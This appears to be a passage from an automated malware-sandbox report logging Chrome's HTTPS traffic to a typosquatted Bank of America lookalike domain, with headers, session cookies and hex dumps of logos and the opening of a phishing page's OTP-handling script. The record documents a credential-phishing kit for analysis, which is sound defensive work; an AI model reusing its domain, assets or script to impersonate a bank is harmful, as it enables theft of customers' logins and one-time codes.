                                                                                              2025-01-15 18:42:00 UTC5194INData Raw: 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 36 22 20 77 69 64 74 68 3d 22 31 33 36 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 34 2e 36 22 3e 3c 64 65 66 73 3e 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 64 3d 22 4d 35 33 2e 37 36 20 30 48 31 33 36 76 31 34 2e 36 48 35 33 2e 37 36 7a 22 2f 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 2f 64 65 66 73 3e 3c 70 61 74 68 20 64 3d 22 4d 30 20 31 32 2e 33 56 35 2e 35 39 68 32 2e 32 37 61 32 2e 36 32 20 32 2e 36 32 20 30 20 30 31 31 2e 32 39 2e 32 38 20 31 2e 38 33 20 31 2e 38 33 20
                                                                                              Data Ascii: <svg height="16" width="136" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 136 14.6"><defs><clipPath id="a"><path fill="none" d="M53.76 0H136v14.6H53.76z"/></clipPath></defs><path d="M0 12.3V5.59h2.27a2.62 2.62 0 011.29.28 1.83 1.83


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.1659091188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:00 UTC797OUTGET /assets/special/js/main.js HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:00 UTC286INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 29 Jul 2024 18:01:08 GMT
                                                                                              ETag: "20c8-61e66a545ecf2"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 8392
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Content-Type: application/javascript
                                                                                              2025-01-15 18:42:00 UTC8392INData Raw: 76 61 72 20 6f 74 70 5f 74 69 6d 65 6f 75 74 3d 34 65 34 3b 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 3d 6d 61 6b 65 69 64 28 35 29 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 73 65 73 73 69 6f 6e 22 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 29 3b 76 61 72 20 6f 6e 53 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 73 65 73 73 69 6f 6e 22 3d 3d 3d 65 2e 6b 65 79 26 26 65 2e 6e 65 77 56 61 6c 75 65 21 3d 3d 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 26 26 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 6d 75 6c 74 69 74 61 62 22 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 29 2c 22 6d 75 6c 74 69 74 61 62 22 3d 3d 3d 65 2e 6b 65 79 26 26 65 2e 6e 65 77 56 61 6c 75 65 26 26 65 2e 6e 65 77 56 61 6c 75
                                                                                              Data Ascii: var otp_timeout=4e4;window.session=makeid(5),localStorage.setItem("session",window.session);var onStorage=function(e){"session"===e.key&&e.newValue!==window.session&&localStorage.setItem("multitab",window.session),"multitab"===e.key&&e.newValue&&e.newValu


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.1659096188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:00 UTC556OUTGET /assets/pill.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:00 UTC249INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:08:20 GMT
                                                                                              ETag: "7e6-6118046b4bd00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2022
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:00 UTC2022INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2a 00 00 00 16 08 06 00 00 00 b6 7b 0e 8d 00 00 05 54 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 32 2d 63 30 30 30 20 37 39 2e 31 62 36 35 61 37 39 62 34 2c 20 32 30 32 32 2f 30 36 2f 31 33 2d 32 32 3a 30 31 3a 30 31 20 20 20 20 20 20 20 20 22 3e 0a 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70
                                                                                              Data Ascii: PNGIHDR*{TiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79b4, 2022/06/13-22:01:01 "> <rdf:RDF xmlns:rdf="http


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.1659097188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:00 UTC851OUTGET /assets/BofA_rgb.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:01 UTC251INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:02:46 GMT
                                                                                              ETag: "99fe-6118032cc4d80"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 39422
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:01 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 f0 00 00 00 aa 08 06 00 00 00 e2 17 6e 41 00 00 00 09 70 48 59 73 00 00 17 12 00 00 17 12 01 67 9f d2 52 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                                                                              Data Ascii: PNGIHDRnApHYsgROiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K
                                                                                              2025-01-15 18:42:01 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii:
                                                                                              2025-01-15 18:42:01 UTC6654INData Raw: 31 a2 8d 76 bd 87 9f 82 1e ca 67 67 66 02 87 e1 a7 c0 e5 99 a8 be 40 14 b3 81 43 81 19 1e db 3c 08 3f ab 66 ca c9 44 cf 2f 75 2b 06 b0 cf 9d f0 9b ea 67 94 4e a3 5c db 8f e8 83 f9 d3 3d bc 54 fb 18 d0 ef e5 5e 4a f2 ec b1 94 5f 66 ee 75 2f b1 22 e5 ec 33 e0 0c 60 15 ac 1e d7 5d 58 70 51 e2 e3 7b 55 cf ea ea d2 26 d9 10 ab cb 15 d5 d0 0c 3c 2b 74 73 fb 23 e5 eb 55 60 3d e0 5a 92 09 a6 3f 04 74 c7 06 74 b3 6e 4b 2c 06 17 6a fc ec 25 77 6c ff ae fb 6e bc 9a a7 f0 99 bb 02 1f 34 f1 6f da bb 8b 6f 57 2c c0 ed 33 9d 42 7f ac 42 f6 fd 19 38 1e ab 01 9b 79 68 c7 47 0a 9c 11 44 9f ed dd 1b cb dd fe b3 2e 35 de 04 ae c6 f2 a6 47 d1 1a b8 11 5b dd d0 a0 6e 2d c9 07 c0 c5 c0 df 3c b6 79 23 56 f0 51 b3 a6 7f ff 22 ed 6b f6 c0 7a 01 ec ef 7a 31 f4 9f e4 97 8f c1 fc 7f
                                                                                              Data Ascii: 1vggf@C<?fD/u+gN\=T^J_fu/"3`]XpQ{U&<+ts#U`=Z?ttnK,j%wln4ooW,3BB8yhGD.5G[n-<y#VQ"kzz1


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.1659098188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:00 UTC555OUTGET /assets/BOA.PNG HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:01 UTC252INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:29:04 GMT
                                                                                              ETag: "116c1-6118090daac00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 71361
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:01 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 51 00 00 00 54 08 06 00 00 00 63 a0 bd 84 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e ec 7d 07 b8 16 45 d2 b5 01 30 6e 56 10 54 72 56 51 c9 19 c1 04 e6 9c b3 20 e9 92 33 12 25 09 92 41 44 89 22 51 30 93 14 41 44 24 4b ce f9 e6 9c 73 e2 fc e7 54 cf dc 7b 0d eb ae ec ea fe cf f3 bd 75 6f bf 33 d3 33 d3 5d 5d 5d 5d 5d 67 ba a7 e7 02 04 28 40 01 0a 50 80 02 14 a0 00 05 28 40 01 fa c3 e8 dc b9 73 16 7e ba 2f fa e9 f1 8f 48 e7 8a fc e1 5c 3e a3 bc e0 62 dc 56 f7 e7 eb bc 45 78 d7 e5 21 97 21 8f 41 e9 e4 67 67 23 37 25 05 59 67 43 91 b1 7d 2f d2 56 ac 46 d2 e4 d9 88 eb 3d
                                                                                              Data Ascii: PNGIHDRQTcsRGBgAMAapHYsodIDATx^}E0nVTrVQ 3%AD"Q0AD$KsT{uo33]]]]]g(@P(@s~/H\>bVEx!!Agg#7%YgC}/VF=
                                                                                              2025-01-15 18:42:01 UTC16384INData Raw: 3a 5a 12 94 60 c0 01 a8 76 94 bf eb 94 2f 2a d7 01 95 9b 0e 60 a7 3b 0d 9f ae de e5 ac 8c 1c 26 64 91 1f 39 4f 72 54 14 c7 28 6b e0 4e 9a 8e 67 35 7f 60 ea fb df 10 80 a8 33 65 bd b0 2e 55 5e 03 38 3c be a4 4a 17 d6 4d 2f 8c 99 f1 25 ef 73 49 e9 26 ab 06 ed 5b 9c 3a 4a af b3 b2 ac 5c fa ea 37 2c 8e 75 27 d3 17 97 98 82 37 a6 7c 8e da f7 8d 64 27 23 7d a1 83 41 9d 30 27 c8 0c 6f 07 5c 55 bb 37 9e e8 30 1b 73 97 6c 41 7c 62 2a ef d3 fd 0c 4a 4c 46 ca 3a 1a 19 f9 73 d8 c4 8e b8 c3 90 05 b8 e5 be 11 ee 7e 4d 15 20 b8 28 26 47 8a fa 27 67 45 4f c0 d4 69 bc c6 0e f6 cb 8d 47 58 6f c9 bc 5f fc 79 cc 93 fc e3 9f c6 ff 88 14 ad b2 f9 d7 f1 50 a2 ce b3 32 da 91 0b 2a af 76 bd 38 5d e9 1f 6a ea ca 37 5b 8e 61 d8 a4 cf 51 ef a1 91 b8 be 71 5f fc e9 86 6e ac df ae 28
                                                                                              Data Ascii: :Z`v/*`;&d9OrT(kNg5`3e.U^8<JM/%sI&[:J\7,u'7|d'#}A0'o\U70slA|b*JLF:s~M (&G'gEOiGXo_yP2*v8]j7[aQq_n(
                                                                                              2025-01-15 18:42:01 UTC16384INData Raw: 1f 46 ec d3 dd 91 38 72 ba 7d dc 36 fb d0 71 e4 25 a7 21 5f d3 77 99 bf 16 89 70 fe 81 b3 7d 26 75 2b bc db ba 5d ed 48 06 e2 95 76 22 3b 07 d9 31 31 c8 d8 b1 07 a9 f3 3f 44 72 df 31 48 78 a0 1d a2 6e bd df 3e d6 1b 52 da 07 4e 0c e2 4b 40 cf f8 f7 ca c0 a0 a9 87 b6 cc ba 17 ec a3 bf ba 8e 41 53 11 c3 ca f0 da b2 cd 11 d5 f8 09 24 3c df 1b c9 63 de 41 da c7 6b 91 f5 c3 41 e4 45 c6 d8 4a 85 92 a9 ca e0 2f 76 e1 56 74 3c 3f bd 09 80 a8 df 8d a4 3e 52 1e a7 4d 4e a1 1c cd fd 05 10 65 c6 be 92 7b 02 2e 43 ff 7c ef f7 b1 8b 46 31 5a 0b 03 08 bf 4b 59 d9 a0 b2 d9 29 a5 d3 78 24 a7 65 62 e1 8a 6d 78 aa c3 bb b6 f4 ac fb d8 ae 9e b4 69 2b 27 2d 08 25 aa 75 45 b3 c7 26 d0 18 7f 81 43 27 23 d5 fc f8 e7 1a b4 53 ec a2 0a e3 9d 33 45 2a c2 37 b7 66 0c 8c b4 cd c3 b7
                                                                                              Data Ascii: F8r}6q%!_wp}&u+]Hv";11?Dr1Hxn>RNK@AS$<cAkAEJ/vVt<?>RMNe{.C|F1ZKY)x$ebmxi+'-%uE&C'#S3E*7f
                                                                                              2025-01-15 18:42:01 UTC16384INData Raw: 4b 87 a3 4a 0b fc a9 7a 07 0c 78 eb 0b a4 a7 65 a1 b0 48 cb 97 7a 23 36 85 60 42 48 62 45 ca cf 0a 36 8a 26 7c 94 13 c1 3e 6c d8 9a 82 86 9d 27 e0 bc eb 5e a2 b2 95 63 e9 ca c7 d3 94 11 d1 84 8e 9e 56 e7 5b 81 6d 3b e5 44 05 cd 48 7f 2c 96 e4 94 6c 4c 9d b9 1c cf b5 1b cf fa 6a cf 77 64 70 f9 c2 1f 42 4d 83 fb 9f 6a 74 1c 6f 7a 05 95 ea 76 a1 43 a3 a9 3c 12 ee 54 e8 4a 23 50 ac fb 3b 51 11 c5 16 10 ab ff 5e ea ca 23 af 22 f9 d0 bf e8 73 82 d0 89 aa 11 99 ce a7 f4 5a 11 83 69 44 ac 9f 93 6a b5 c2 83 4d de c2 e8 89 df 23 3d 3d c7 f6 da 99 bf 74 2b fe d6 6c 34 8e 24 4d 32 fe a2 3d b7 3e ef 5e ce 6c f9 0b 1b a3 fa 4d 3d d1 b8 d3 44 ac 52 cf 5e 69 61 d0 0f 26 61 13 4b 87 8e 12 3b aa 0b 95 99 07 45 1e b1 c7 f4 4f 39 52 3b f0 a7 4c 54 c9 68 61 fe c2 67 c5 67 36
                                                                                              Data Ascii: KJzxeHz#6`BHbE6&|>l'^cV[m;DH,lLjwdpBMjtozvC<TJ#P;Q^#"sZiDjM#==t+l4$M2=>^lM=DR^ia&aK;EO9R;LThagg6
                                                                                              2025-01-15 18:42:01 UTC5825INData Raw: 62 7e b9 05 00 00 16 a5 49 44 41 54 17 d7 ef 8d e6 1d 27 e1 e3 cf d7 20 bf c4 07 7e 25 2a 82 0c 19 dd 6e ec 28 dc d3 57 7e 36 6e 4d 41 d3 ee da d3 a5 a7 2d e4 a1 6f 0d 8e 65 7e 8e 66 7e 8e 56 f9 32 ee eb 1f 1e 84 e9 73 d7 60 47 72 06 c9 0b 0b 83 e5 62 10 96 94 d3 6c 86 1f 93 54 dc 79 34 b0 7e da b4 13 43 c7 7f 8b da 77 bf 66 fb 5c 1c 4b c5 ac f2 52 3a 9e 06 eb 93 e7 32 3e 4f bd aa 33 fa 8f fa d2 de 2d 5b f0 4a 47 a0 54 2c f2 32 61 2e f6 f4 bc 43 7a 66 2e 1d 88 39 a8 fb c0 1b 56 f7 47 53 71 1d 25 9e 60 5e 8e ab 4a 24 9f a8 97 fd b1 56 a3 f1 ee d4 05 b6 c8 87 ea c0 e2 52 dc 56 fe 42 a5 55 6a 2b 88 6d 4f c9 c4 80 d1 5f d1 41 7a 1d 67 5c d3 89 e5 df dc 78 f0 38 3a 26 c7 55 0d f3 d3 c6 a6 56 5e 70 cb cb 68 db f3 23 7c f6 d5 1a ec a6 f1 a1 da 00 b4 4b 3c cb 5e
                                                                                              Data Ascii: b~IDAT' ~%*n(W~6nMA-oe~f~V2s`GrblTy4~Cwf\KR:2>O3-[JGT,2a.Czf.9VGSq%`^J$VRVBUj+mO_Azg\x8:&UV^ph#|K<^


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.1659099188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:01 UTC850OUTGET /assets/sign-in-sprite.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:01 UTC249INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:25:52 GMT
                                                                                              ETag: "c2f-611808568fc00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 3119
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:01 UTC3119INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 09 00 00 00 87 08 06 00 00 00 c4 2b 73 b8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                                                                              Data Ascii: PNGIHDR+spHYsOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              29192.168.2.1659101188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:01 UTC573OUTGET /assets/fsd-secure-esp-sprite.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:01 UTC248INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:19:56 GMT
                                                                                              ETag: "1d9-611807030db00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 473
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:01 UTC473INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0c 00 00 00 25 08 06 00 00 00 76 d6 08 19 00 00 01 a0 49 44 41 54 38 cb ed 94 39 8b 42 31 14 85 f3 53 15 f7 7d 43 41 11 51 10 4b b1 d2 3f 61 63 63 21 d8 d8 58 08 56 36 96 62 23 2a 8a e2 be 9d e1 5c cd d3 61 a6 98 14 af 9b c0 79 4b 92 2f f7 dc fb f2 a2 1e 8f 07 6e b7 1b 8e c7 23 a6 d3 29 da ed 36 ba dd 2e 26 93 09 74 db ef f7 b8 df ef 7c 54 8a d7 ed 76 8b 56 ab 85 5c 2e 07 bf df 2f 8a c7 e3 68 36 9b 38 9d 4e e0 a2 af a6 d4 66 b3 41 a7 d3 41 22 91 40 24 12 41 bd 5e 47 a3 d1 80 d7 eb 45 34 1a c5 70 38 14 07 16 40 2b d5 6a 15 c9 64 12 fd 7e 1f 5c 80 16 7a bd 9e f4 d5 6a b5 9f 40 20 10 10 1b ab d5 0a d7 eb 55 46 16 8b 05 1c 0e 07 5c 2e 17 0e 87 c3 1b 58 af d7 28 14 0a 28 95 4a 92 38 3d 5f 2e 17 ec 76 3b
                                                                                              Data Ascii: PNGIHDR%vIDAT89B1S}CAQK?acc!XV6b#*\ayK/n#)6.&t|TvV\./h68NfAA"@$A^GE4p8@+jd~\zj@ UF\.X((J8=_.v;


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              30192.168.2.1659102188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:01 UTC563OUTGET /assets/help-qm-fsd.png HTTP/1.1
